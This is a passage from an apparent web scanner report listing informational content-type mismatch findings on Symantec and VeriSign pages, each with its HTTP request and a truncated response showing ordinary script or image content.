HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Content-Length: 81 Expires: Fri, 09 Sep 2011 21:33:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:33:41 GMT Connection: close Vary: Accept-Encoding { "query":"xss", "results": [ {"name":"xss-vulnerabilities", "type":"suggest"}] }
23.42. http://www.symantec.com/search/searchjs.jsp
Summary
Severity: Information
Confidence: Firm
Host: http://www.symantec.com
Path: /search/searchjs.jsp
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html;charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /search/searchjs.jsp?lg=en&ct=us&sg=business HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622035736-New%7C1336358035736%3B%20event69%3Devent69%7C1336358035737%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 6094 Cache-Control: public, max-age=3548 Date: Fri, 09 Sep 2011 21:33:39 GMT Connection: close var omniture_region = "NAM"; var omniture_country = "us"; var omniture_language = "en"; var more_results = "More results from"; var site_name = "Symantec.com"; var breadcrumb_search_title = "Search...[SNIP]...
23.43. http://www.verisign.ch/assets/global/js/leftnav.js
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.ch
Path: /assets/global/js/leftnav.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /assets/global/js/leftnav.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 4994 Content-Type: text/html /** * Version 2.0 * Author: Rob Perez * Date: August 20, 2010 * * Usage: * * Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired. * * Somew...[SNIP]...
23.44. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.ch
Path: /assets/shared/js/jquery.url.packed.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /assets/shared/js/jquery.url.packed.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 1935 Content-Type: text/html jQuery.url=function(){var segments={};var parsed={};var options={url:window.location,strictMode:false,key:["source","protocol","authority","userInfo","user","password","host","port","relative","path",...[SNIP]...
23.45. http://www.verisign.ch/assets/shared/js/leftnav_new.js
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.ch
Path: /assets/shared/js/leftnav_new.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /assets/shared/js/leftnav_new.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 4994 Content-Type: text/html /** * Version 2.0 * Author: Rob Perez * Date: August 20, 2010 * * Usage: * * Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired. * * Somew...[SNIP]...
23.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.ch
Path: /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 22346 //////////////////////////////////// //Main JS functions for verisign.com //////////////////////////////////// function findObj(n, d){ var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&pa...[SNIP]...
23.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.ch
Path: /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 3364 Content-Type: text/html ///////////////////////////////////////////////////////////////////////////// // Function : vrsnNavMenuElements // Comments : /////////////////////////////////////////////////////////////////////////...[SNIP]...
23.48. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.com
Path: /authweb/global/assets/header/js/flyouts.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:18 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:18 GMT Content-Type: text/html Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
23.49. http://www.verisign.com/authweb/global/assets/header/js/header.js
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.com
Path: /authweb/global/assets/header/js/header.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:18 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:18 GMT Content-Length: 1558 Content-Type: text/html /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
23.50. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.com
Path: /authweb/global/assets/header/js/jquery.autocomplete.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:19 GMT Content-Type: text/html Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 Jörn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
23.51. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/images/favicon.ico
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain unrecognised content.
Request
GET /authweb/global/assets/shared/images/favicon.ico HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT Accept-Ranges: bytes Content-Length: 1150 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html ............ .h.......(....... ..... .....@......................................>...........................................................q...................................9.........................[SNIP]...
23.52. http://www.verisign.com/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg
Issue detail
The response contains the following Content-type statement:
Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.
Request
GET /authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:47 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT Accept-Ranges: bytes Content-Length: 15431 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:24:47 GMT Content-Type: image/jpeg GIF89a..............Os.............l.qqr.......-...........Yg......"?|NP......................$H..............................NQe.N+.....u.q..........3ny..4^..........<{...............Z:&1......?f.......[SNIP]...
23.53. http://www.verisign.com/authweb/global/assets/shared/images/ps-freetrial-promo.jpg
Summary
Severity: Information
Confidence: Firm
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/images/ps-freetrial-promo.jpg
Issue detail
The response contains the following Content-type statement:
Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.
Request
GET /authweb/global/assets/shared/images/ps-freetrial-promo.jpg HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:47 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT Accept-Ranges: bytes Content-Length: 14365 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:24:47 GMT Content-Type: image/jpeg GIF89a.....................3.....K..{...................................................................................s...............................s...u....Bh..................... !!.....f...QXVw...[SNIP]...
23.54. http://www.verisign.com/authweb/global/assets/shared/js/globals.js
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/globals.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/globals.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 3608 Content-Type: text/html /******************************************* ** Utility functions ** *******************************************/ function linkPopUp(url) { popupWin = window.open...[SNIP]...
23.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.boxshadow.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1538 Content-Type: text/html /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
23.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1356 Content-Type: text/html /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
23.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 15622 /* * FancyBox - jQuery Plugin * Simple and fancy lightbox alternative * * Examples and documentation at: http://fancybox.net * * Copyright (c) 2008 - 2010 Janis Skarnelis * That said, it is har...[SNIP]...
23.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1614 Content-Type: text/html /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
23.59. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain CSS.
Request
GET /authweb/global/assets/shared/js/jquery.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:16 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:16 GMT Content-Type: text/html Content-Length: 78803 /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Incl...[SNIP]...
23.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.custom.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; 